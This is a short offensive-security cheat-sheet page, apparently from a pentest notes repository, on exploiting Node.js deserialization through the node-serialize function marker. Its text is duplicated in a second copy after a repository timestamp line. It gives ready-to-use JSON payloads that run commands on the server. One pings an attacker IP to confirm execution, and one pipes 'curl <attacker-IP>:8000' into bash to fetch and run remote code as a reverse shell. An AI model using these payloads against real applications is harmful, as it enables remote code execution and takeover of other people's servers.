killchain-compendium/exploit/web/nodejs/deserialization.md

# De/Serialization

* `_$$ND_FUNC$$_function (){}` is executed after parsing

## Example Payloads

* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
* reverse shell via 
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
pickle 2021-12-04 00:26:03 +01:00			`# De/Serialization`

			* `_$$ND_FUNC$$_function (){}` is executed after parsing

			`## Example Payloads`

			* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
			```js
			`{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}`
			```
			`* reverse shell via`
			```js
			`{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 \| bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}`
			```